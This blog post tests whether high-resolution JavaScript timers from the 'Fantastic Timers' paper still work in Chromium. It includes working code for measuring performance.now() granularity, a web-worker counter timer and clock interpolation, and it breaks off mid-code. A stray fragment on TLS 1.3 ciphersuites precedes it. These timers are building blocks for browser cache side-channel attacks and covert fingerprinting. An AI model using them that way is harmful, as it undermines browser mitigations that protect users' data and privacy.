<figcaption>Much simpler TLS 1.3 ciphersuite (<a href="https://www.thesslstore.com/blog/tls-1-3-everything-possibly-needed-know/">Image taken from the www.thesslstore.com blog</a>)</figcaption>
</figure>
<p>There were an awful lot of <a href="https://www.iana.org/assignments/tls-parameters/tls-parameters-4.csv">TLS 1.2 ciphersuite choices</a>. </p>
<p>With TLS 1.3, we have only the following recommended secure choices:</p>
<ul>
<li>TLS_AES_256_GCM_SHA384</li>
<li>TLS_CHACHA20_POLY1305_SHA256</li>
<li>TLS_AES_128_GCM_SHA256</li>
<li>TLS_AES_128_CCM_8_SHA256</li>
<li>TLS_AES_128_CCM_SHA256</li>
</ul>On High-Precision JavaScript Timers2021-12-18T20:40:00+01:002021-12-18T20:40:00+01:00Nikolai Tschachertag:incolumitas.com,2021-12-18:/2021/12/18/on-high-precision-javascript-timers/<p>I in this blog post, I am investigating the current state of high precision JavaScript timers. High precision timing techniques were mostly used to launch CPU-level cache attacks such as Spectre and Meltdown from the browser. I am interested in other use cases though...</p><h2>Introduction</h2>
<p>I in this blog post, I am investigating the current state of high precision JavaScript timers. High precision timing techniques were mostly required to launch CPU-level cache attacks such as <a href="https://spectreattack.com/spectre.pdf">Spectre</a> and <a href="https://meltdownattack.com/meltdown.pdf">Meltdown</a> from within the browser with JavaScript. However, I am not interested in cache attacks, I need high precision JavaScript timing techniques mostly to detect proxies and VPN usage via side channel analysis.</p>
<p>However, those papers mentioned above are deeply amazing. I do not think that it get's much better in the field of IT Security. The sheer human creativity demonstrated by finding those cache and CPU-level attack vectors is simply outstanding. I highly recommand you to read those papers (Also the <a href="https://platypusattack.com/platypus.pdf">Platypus paper</a> on power side-channel attacks).</p>
<p>Firefox and Google Chrome <strong>reduced the precision of <code>performance.now()</code> significantly</strong>:</p>
<ol>
<li><a href="https://developer.chrome.com/blog/cross-origin-isolated-hr-timers/">Google Chrome reduced</a> the <code>performance.now()</code> precision to 100 microseconds (<code>100µs</code> or <code>0.1ms</code>)</li>
<li><a href="https://developer.mozilla.org/en-US/docs/Web/API/Performance/now#reduced_time_precision">Firefox reduced</a> the <code>performance.now()</code> precision even more to 1000 microseconds (<code>1000µs</code> or <code>1ms</code>)</li>
</ol>
<p><em>Those bastards!</em></p>
<p>As mentioned, high precision timers are used to launch side-channel and timing attacks. In recent years, low level vulnerabilities such as Spectre, Meltdown, Rowhammer emerged. They all have in common that the attacker needs the ability to take high resolution time measurements.</p>
<p>The awesome <a href="https://security.googleblog.com/2021/03/a-spectre-proof-of-concept-for-spectre.html">Google Security Blog</a> explains on the <a href="https://leaky.page/timer.html">Spectre Proof-Of-Concept website</a> why:</p>
<blockquote>
<p>Before we run the Spectre proof of concept, we need a way to observe the side-effects of the transient execution. The most popular one is a cache side channel. By timing a memory access, we can infer if a chosen address is in the cache (if the access is fast) or needs to be loaded from memory (if the access is slow). Later, we will use a Spectre gadget to access a JavaScript array using a secret value as the index. Testing which array index got cached will allow us to recover that secret value.</p>
</blockquote>
<p>So I learned that:</p>
<ul>
<li>Timing memory accesses reveals if a chosen address is in the cache or not</li>
<li>A fast memory access means that the accessed address is cached</li>
<li>A slow memory access means that the accessed address needs to be loaded from the memory</li>
<li>In order to measure the tiny difference in access times, <strong>we need high-precision JavaScript timers</strong></li>
</ul>
<p>And then they go on...</p>
<blockquote>
<p>To be able to measure these small timing differences we need a high-precision timer. There is a great paper on this topic by Michael Schwarz, Clémentine Maurice, Daniel Gruss, and Stefan Mangard: <a href="https://pure.tugraz.at/ws/portalfiles/portal/17611474/fantastictimers.pdf">"Fantastic Timers and Where to Find Them: High-Resolution Microarchitectural Attacks in JavaScript"</a>. One example they show is the use of a SharedArrayBuffer as a monotonic clock: increment a counter in a worker thread and read it from a second thread as a high precision timestamp. SharedArrayBuffers in particular are nowadays only available if the site is cross-origin isolated but there are many more timers described in that paper.</p>
</blockquote>
<p>Unfortunately, the <code>SharedArrayBuffer</code> is no longer allowed by default. MDN says about <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/SharedArrayBuffer#security_requirements">SharedArrayBuffer</a>:</p>
<blockquote>
<p>Shared memory and high-resolution timers were effectively disabled at the start of 2018 in light of Spectre. </p>
</blockquote>
<p>and if you still want to use <code>SharedArrayBuffer</code>, you will need to do the following:</p>
<blockquote>
<p>As a baseline requirement, your document needs to be in a secure context. For top-level documents, two headers will need to be set to cross-origin isolate your site: <code>Cross-Origin-Opener-Policy</code> with <code>same-origin</code> as value (protects your origin from attackers) and <code>Cross-Origin-Embedder-Policy</code> with <code>require-corp</code> as value (protects victims from your origin)</p>
</blockquote>
<p>So my next idea is to try to make use of the other high precision timers presented in the paper cited above: <a href="https://pure.tugraz.at/ws/portalfiles/portal/17611474/fantastictimers.pdf">Fantastic Timers and Where to Find Them: High-Resolution Microarchitectural Attacks in JavaScript</a>.</p>
<p>Do the proposed techniques from early 2017 still work? In the next sections, I am going to test some of the techniques presented by the authors.</p>
<p>All tests were conducted on Ubuntu 18.04 with the <code>Chromium 95.0.4638.69</code> browser.</p>
<h2>Base precision of <code>performance.now()</code></h2>
<p>My setup:</p>
<div class="highlight"><pre><span></span><code>$ chromium-browser --version
Chromium <span class="m">95</span>.0.4638.69 Built on Ubuntu , running on Ubuntu <span class="m">18</span>.04
</code></pre></div>
<p>First of all, I want to confirm that the precision/resolution of <code>performance.now()</code> is really <code>100µs</code> or <code>0.1ms</code> on <code>Chromium 95.0.4638.69</code>.</p>
<p>This is accomplished by the below JavaScript snippet. I am collecting 10.000 <code>performance.now()</code> samples in a for-loop and I look how many unique samples are among those 10.000 collected samples, which gives me the precision. </p>
<div class="highlight"><pre><span></span><code><span class="s1">'use strict'</span><span class="p">;</span>
<span class="c1">// The performance.now() method returns a DOMHighResTimeStamp, measured in milliseconds.</span>
<span class="kd">var</span> <span class="nx">samples</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">10000</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">samples</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">());</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">t1</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">let</span> <span class="nx">diff1</span> <span class="o">=</span> <span class="nx">t1</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">diff2</span> <span class="o">=</span> <span class="nx">samples</span><span class="p">[</span><span class="nx">samples</span><span class="p">.</span><span class="nx">length</span> <span class="o">-</span> <span class="mf">1</span><span class="p">]</span> <span class="o">-</span> <span class="nx">samples</span><span class="p">[</span><span class="mf">0</span><span class="p">];</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'#1 Elapsed measured by performance.now(): '</span> <span class="o">+</span> <span class="nx">diff1</span> <span class="o">+</span> <span class="s1">'ms'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'#2 Elapsed measured by collected samples: '</span> <span class="o">+</span> <span class="nx">diff2</span> <span class="o">+</span> <span class="s1">'ms'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Number of samples: '</span> <span class="o">+</span> <span class="nx">samples</span><span class="p">.</span><span class="nx">length</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">s</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Set</span><span class="p">(</span><span class="nx">samples</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Number of unique samples / measuring steps: '</span> <span class="o">+</span> <span class="nx">s</span><span class="p">.</span><span class="nx">size</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Granularity/Precision #1 of performance.now(): '</span> <span class="o">+</span> <span class="nx">diff1</span> <span class="o">/</span> <span class="nx">s</span><span class="p">.</span><span class="nx">size</span> <span class="o">+</span> <span class="s1">'ms'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Granularity/Precision #2 of performance.now(): '</span> <span class="o">+</span> <span class="nx">diff2</span> <span class="o">/</span> <span class="nx">s</span><span class="p">.</span><span class="nx">size</span> <span class="o">+</span> <span class="s1">'ms'</span><span class="p">);</span>
</code></pre></div>
<p>As expected, the precision is almost exactly <code>100µs</code> or <code>0.1ms</code>.</p>
<div class="highlight"><pre><span></span><code>#1 Elapsed measured by performance.now(): 15.20000000006985ms
#2 Elapsed measured by collected samples: 15.20000000006985ms
Number of samples: 10000
Number of unique samples / measuring steps: 146
Granularity/Precision #1 of performance.now(): 0.10410958904157432ms
Granularity/Precision #2 of performance.now(): 0.10410958904157432ms
</code></pre></div>
<p>If you invoke <code>performance.now()</code> repeatedly in a while loop until you obtain a new timer value from <code>performance.now()</code> and you increment a counter until that point, then the value of the counter is considered the edge size of the timer resolution.</p>
<div class="highlight"><pre><span></span><code><span class="p">(</span><span class="kd">function</span> <span class="nx">edgeSize</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">counter</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">next</span><span class="p">,</span> <span class="nx">last</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="k">while</span><span class="p">((</span><span class="nx">next</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">())</span> <span class="o">==</span> <span class="nx">last</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">counter</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">counter</span><span class="p">);</span>
<span class="p">})()</span>
</code></pre></div>
<p>Put differently, the granularity of the <code>performance.now()</code> resolution can be measured in terms of increments of the <code>counter</code> variable. The counter is reset as soon as a new <code>performance.now()</code> is observed.</p>
<h2>Building a Timer by (ab)using Web Workers</h2>
<p>JavaScript's concurrency model is based on a single-threaded event loop. Multithreading was introduced into JavaScript with <em>web workers</em>, which run in parallel and have their own event loop.</p>
<p>Here, I am creating an <strong>implicit timer</strong> by attempting to abuse web workers to derive highly accurate timestamps. Put differently, we throw <code>performance.now()</code> into the trash and create our own timer!</p>
<p>Or more nuanced: We create a web worker thread and let it monotonically increase a counter and consider it an approximation of a real timer.</p>
<p>But the <a href="https://pure.tugraz.at/ws/portalfiles/portal/17611474/fantastictimers.pdf">Fantastic Timers Paper</a> lists some caveats:</p>
<blockquote>
<p>Web workers cannot post messages to other web workers (including themselves). They can only post messages to the main thread and web workers they spawn, so called sub workers.
Posting messages to the main thread again blocks the main thread’s event loop,
leaving sub web workers as the only viable option.</p>
</blockquote>
<p><a
class="btn"
style="margin-top: 3px; margin-bottom: 3px"
href="https://bot.incolumitas.com/timers/web_worker_timer.html">
Live Example of High-Precision Web Worker Timer
</a></p>
<p>And this is how our implicit timer works:</p>
<ol>
<li>
<p>If the worker receives a message from the main thread, it sends back its current counter value. </p>
</li>
<li>
<p>Otherwise, the worker continuously <em>requests</em> the current counter value from the sub worker.</p>
</li>
<li>
<p>The sub worker increments the counter on each request and sends the current
value back to the worker.</p>
</li>
</ol>
<p>And in code:</p>
<p><code>web_worker_timer.html</code>:</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">html</span><span class="p">></span>
<span class="p"><</span><span class="nt">head</span><span class="p">></</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">body</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span>
<span class="kd">var</span> <span class="nx">ts</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Worker</span><span class="p">(</span><span class="s1">'subworker.js'</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">counter</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">count</span> <span class="o">=</span> <span class="nx">e</span><span class="p">.</span><span class="nx">data</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">count</span> <span class="o">></span> <span class="mf">0</span><span class="p">)</span> <span class="p">{</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="s1">'Counter: '</span> <span class="o">+</span> <span class="nx">count</span> <span class="o">+</span> <span class="s1">'<br>'</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">precision</span> <span class="o">=</span> <span class="nx">elapsed</span> <span class="o">/</span> <span class="nx">count</span><span class="p">;</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="s1">'Precision: '</span> <span class="o">+</span> <span class="nx">precision</span> <span class="o">+</span> <span class="s1">' ms<br>'</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">ts</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s1">'message'</span><span class="p">,</span> <span class="nx">counter</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span>
<span class="nx">ts</span><span class="p">.</span><span class="nx">postMessage</span><span class="p">(</span><span class="mf">0</span><span class="p">);</span>
<span class="c1">// setTimeout() acts as a method that</span>
<span class="c1">// we want to time</span>
<span class="nx">setTimeout</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="nx">ts</span><span class="p">.</span><span class="nx">postMessage</span><span class="p">(</span><span class="mf">0</span><span class="p">);</span>
<span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">);</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="s1">'Elapsed Time: '</span> <span class="o">+</span> <span class="nx">elapsed</span> <span class="o">+</span> <span class="s1">'<br>'</span><span class="p">);</span>
<span class="p">},</span> <span class="mf">1000</span><span class="p">)</span>
<span class="p"></</span><span class="nt">script</span><span class="p">></span>
<span class="p"></</span><span class="nt">body</span><span class="p">></span>
<span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>
<p><code>subworker.js</code>:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">sub</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Worker</span><span class="p">(</span><span class="s1">'subworker2.js'</span><span class="p">);</span>
<span class="nx">sub</span><span class="p">.</span><span class="nx">postMessage</span><span class="p">(</span><span class="mf">0</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">count</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="nx">sub</span><span class="p">.</span><span class="nx">onmessage</span> <span class="o">=</span> <span class="nx">msg</span><span class="p">;</span>
<span class="nx">onmessage</span> <span class="o">=</span> <span class="nx">msg</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">msg</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">event</span><span class="p">.</span><span class="nx">data</span> <span class="o">!=</span> <span class="mf">0</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">count</span> <span class="o">=</span> <span class="nx">event</span><span class="p">.</span><span class="nx">data</span><span class="p">;</span>
<span class="nx">sub</span><span class="p">.</span><span class="nx">postMessage</span><span class="p">(</span><span class="mf">0</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">self</span><span class="p">.</span><span class="nx">postMessage</span><span class="p">(</span><span class="nx">count</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p><code>subworker2.js</code>:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">count</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="nx">onmessage</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">count</span><span class="o">++</span><span class="p">;</span>
<span class="nx">postMessage</span><span class="p">(</span><span class="nx">count</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>But what is the precision I am able to obtain with the above method?</p>
<div class="highlight"><pre><span></span><code>Elapsed Time: 1000.2000000001863
Counter: 10844
Precision: 0.09223533751384971 ms
</code></pre></div>
<p>So this is bad news. I only manage to obtain the same precision as <code>performance.now()</code> gives us. Fail!</p>
<p>The authors from the <a href="https://pure.tugraz.at/ws/portalfiles/portal/17611474/fantastictimers.pdf">Fantastic Timers Paper</a> claim that the achieved resolution is up to <code>15 μs</code>. I only manage to get around <code>90µs - 100µs</code> with my somewhat old laptop from 2014.</p>
<p>However, on <a href="https://browserstack.com/">browserstack.com</a>, when using a real device, I manage to get results around <code>40µs / 50µs</code>, thus beating <code>performance.now()</code></p>
<div class="highlight"><pre><span></span><code>Elapsed Time: 1041.89999
Counter: 19083
Precision: 0.0545 ms
</code></pre></div>
<p>Therefore, with fast devices, the claimed <code>15 μs</code> is probably realistic!</p>
<h2>Recovering the high resolution of <code>performance.now()</code> with clock interpolation</h2>
<p><a
class="btn"
href="https://bot.incolumitas.com/timers/calibrate.html">
Live Example of Clock Interpolation
</a></p>
<p>The <a href="https://pure.tugraz.at/ws/portalfiles/portal/17611474/fantastictimers.pdf">Fantastic Timers Paper</a> claims in section [3.1 Recovering a high resolution]:</p>
<blockquote>
<p>As the underlying clock source has a high resolution, the
difference between two clock edges varies only as much as the underlying clock.
This property gives us a very accurate time base to build upon. As the time
between two edges is always constant, we interpolate the time between them.</p>
</blockquote>
<p>The idea is as follows:</p>
<p>When repeatedly invoking <code>performance.now()</code> in a while loop, we get the same results from the <code>performance.now()</code> invocation for a certain amount of time. As long as <code>performance.now()</code> yields the same number, we increment a counter. When we get a new value from <code>performance.now()</code>, we reset the counter.</p>
<p>The code below takes <code>n=20</code> samples:</p>
<div class="highlight"><pre><span></span><code><span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span><span class="o">=</span><span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">20</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">counter</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">next</span><span class="p">,</span> <span class="nx">last</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="k">while</span><span class="p">((</span><span class="nx">next</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">())</span> <span class="o">==</span> <span class="nx">last</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">counter</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">next</span><span class="p">,</span> <span class="nx">counter</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>and yields the following output on my machine/browser:</p>
<div class="highlight"><pre><span></span><code><span class="mf">5063.5999999996275</span><span class="w"> </span><span class="mf">4</span><span class="w"></span>
<span class="mf">5063.799999998882</span><span class="w"> </span><span class="mf">13</span><span class="w"></span>
<span class="mf">5063.89999999851</span><span class="w"> </span><span class="mf">5</span><span class="w"></span>
<span class="mf">5064.299999998882</span><span class="w"> </span><span class="mf">11</span><span class="w"></span>
<span class="mf">5064.799999998882</span><span class="w"> </span><span class="mf">35</span><span class="w"></span>
<span class="mf">5064.89999999851</span><span class="w"> </span><span class="mf">4</span><span class="w"></span>
<span class="mf">5065.0999999996275</span><span class="w"> </span><span class="mf">54</span><span class="w"></span>
<span class="mf">5065.199999999255</span><span class="w"> </span><span class="mf">2</span><span class="w"></span>
<span class="mf">5065.39999999851</span><span class="w"> </span><span class="mf">33</span><span class="w"></span>
<span class="mf">5065.5</span><span class="w"> </span><span class="mf">8</span><span class="w"></span>
<span class="mf">5065.699999999255</span><span class="w"> </span><span class="mf">32</span><span class="w"></span>
<span class="mf">5065.799999998882</span><span class="w"> </span><span class="mf">4</span><span class="w"></span>
<span class="mf">5066</span><span class="w"> </span><span class="mf">42</span><span class="w"></span>
<span class="mf">5066.0999999996275</span><span class="w"> </span><span class="mf">19</span><span class="w"></span>
<span class="mf">5066.199999999255</span><span class="w"> </span><span class="mf">3</span><span class="w"></span>
<span class="mf">5066.39999999851</span><span class="w"> </span><span class="mf">42</span><span class="w"></span>
<span class="mf">5066.5999999996275</span><span class="w"> </span><span class="mf">66</span><span class="w"></span>
<span class="mf">5066.799999998882</span><span class="w"> </span><span class="mf">6</span><span class="w"></span>
<span class="mf">5066.89999999851</span><span class="w"> </span><span class="mf">29</span><span class="w"></span>
<span class="mf">5067</span><span class="w"> </span><span class="mf">15</span><span class="w"></span>
</code></pre></div>
<p>What does the above output tell me?</p>
<p>Sometimes edges are <code>0.2ms</code> apart, sometimes <code>0.3ms</code> and sometimes just <code>0.1ms</code>.</p>
<p>In some cases edges are even <code>0.5ms</code> apart:</p>
<div class="highlight"><pre><span></span><code><span class="mf">5064.299999998882</span><span class="w"> </span><span class="mf">11</span><span class="w"></span>
<span class="mf">5064.799999998882</span><span class="w"> </span><span class="mf">35</span><span class="w"></span>
</code></pre></div>
<p>However, isn't our assumption that larger edges also have larger counter values?</p>
<p>Let's collect some <a href="https://bot.incolumitas.com/timers/edges.html">statistical significant data</a>.</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">samples</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">var</span> <span class="nx">stats</span> <span class="o">=</span> <span class="p">{};</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span><span class="o">=</span><span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">1000</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">counter</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">next</span><span class="p">,</span> <span class="nx">last</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="k">while</span><span class="p">((</span><span class="nx">next</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">())</span> <span class="o">==</span> <span class="nx">last</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">counter</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">samples</span><span class="p">.</span><span class="nx">push</span><span class="p">([</span><span class="nx">last</span><span class="p">,</span> <span class="nx">next</span><span class="p">,</span> <span class="nx">counter</span><span class="p">]);</span>
<span class="p">}</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">sample</span> <span class="k">of</span> <span class="nx">samples</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">delta</span> <span class="o">=</span> <span class="p">(</span><span class="nx">sample</span><span class="p">[</span><span class="mf">1</span><span class="p">]</span> <span class="o">-</span> <span class="nx">sample</span><span class="p">[</span><span class="mf">0</span><span class="p">]).</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">2</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">stats</span><span class="p">[</span><span class="nx">delta</span><span class="p">])</span> <span class="p">{</span>
<span class="nx">stats</span><span class="p">[</span><span class="nx">delta</span><span class="p">]</span> <span class="o">=</span> <span class="p">[</span><span class="nx">sample</span><span class="p">[</span><span class="mf">2</span><span class="p">]]</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">stats</span><span class="p">[</span><span class="nx">delta</span><span class="p">].</span><span class="nx">push</span><span class="p">(</span><span class="nx">sample</span><span class="p">[</span><span class="mf">2</span><span class="p">])</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">stats</span><span class="p">)</span>
</code></pre></div>
<p>When invoking the code above, I don't find that larger edges have large counter values.</p>
<p>I get quite weird results:</p>
<figure>
<img src="https://incolumitas.com/images/timersSamples.png" alt="timing" />
<figcaption>Most intervals we get are 0.1ms apart, but larger intervals such as 0.8ms can have quite low counter values. Why?</figcaption>
</figure>
<p>Are the counter values larger and more stable on different machines with different CPUs? I am only testing on my very old laptop from 2014. Maybe this has a large influence. </p>
<p>Indeed, when testing on browserstack with macOS Big Sur and the latest Safari browser:</p>
<figure>
<img src="https://incolumitas.com/images/macOs-bigSur.png" alt="timing" />
<figcaption>Much higher counter values. By a factor of 100. They also appear to be more stable, thus giving us much more accurate timer resolutions.</figcaption>
</figure>
<p>So it has to be noted: <strong>Clock interpolation is highly dependent on OS and CPU!</strong> The faster the device, the larger the counter values and the more accurate the interpolation. </p>
<p>This is the clock interpolation algorithm proposition from <a href="https://pure.tugraz.at/ws/portalfiles/portal/17611474/fantastictimers.pdf">Fantastic Timers Paper</a>.</p>
<p>You can also find the live example here: <a class="btn" href="https://bot.incolumitas.com/timers/calibrate.html">Live Example of Clock Interpolation</a></p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">html</span><span class="p">></span>
<span class="p"><</span><span class="nt">head</span><span class="p">></</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">body</span><span class="p">></span>
<span class="p"><</span><span class="nt">pre</span> <span class="na">id</span><span class="o">=</span><span class="s">"output"</span><span class="p">></</span><span class="nt">pre</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span>
<span class="kd">function</span> <span class="nx">write</span><span class="p">(</span><span class="nx">text</span><span class="p">)</span> <span class="p">{</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s1">'output'</span><span class="p">).</span><span class="nx">innerText</span> <span class="o">+=</span> <span class="nx">text</span> <span class="o">+</span> <span class="s1">'\n'</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">calibrate</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">N</span> <span class="o">=</span> <span class="mf">15</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">counter</span> <span class="o">=</span> <span class="mf">0</span><span class="p">,</span> <span class="nx">next</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">count</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">N</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">next</span> <span class="o">=</span> <span class="nx">wait_edge</span><span class="p">();</span>
<span class="nx">count</span> <span class="o">=</span> <span class="nx">count_edge</span><span class="p">();</span>
<span class="nx">counter</span> <span class="o">+=</span> <span class="nx">count</span><span class="p">;</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Increments per Edge (in Count): '</span> <span class="o">+</span> <span class="nx">count</span> <span class="p">);</span>
<span class="p">}</span>
<span class="nx">next</span> <span class="o">=</span> <span class="nx">wait_edge</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">d1</span> <span class="o">=</span> <span class="nx">wait_edge</span><span class="p">()</span> <span class="o">-</span> <span class="nx">next</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">d2</span> <span class="o">=</span> <span class="nx">counter</span> <span class="o">/</span> <span class="nx">N</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">calibrated</span> <span class="o">=</span> <span class="nx">d1</span> <span class="o">/</span> <span class="nx">d2</span><span class="p">;</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Edge size in performance.now() (ms): '</span> <span class="o">+</span> <span class="nx">d1</span> <span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Average (n='</span> <span class="o">+</span> <span class="nx">N</span> <span class="o">+</span> <span class="s1">') edge size in increments: '</span> <span class="o">+</span> <span class="nx">d2</span> <span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Calibration value (average ms per increment step): '</span> <span class="o">+</span> <span class="nx">calibrated</span> <span class="p">);</span>
<span class="k">return</span> <span class="nx">calibrated</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">wait_edge</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">next</span><span class="p">,</span> <span class="nx">last</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
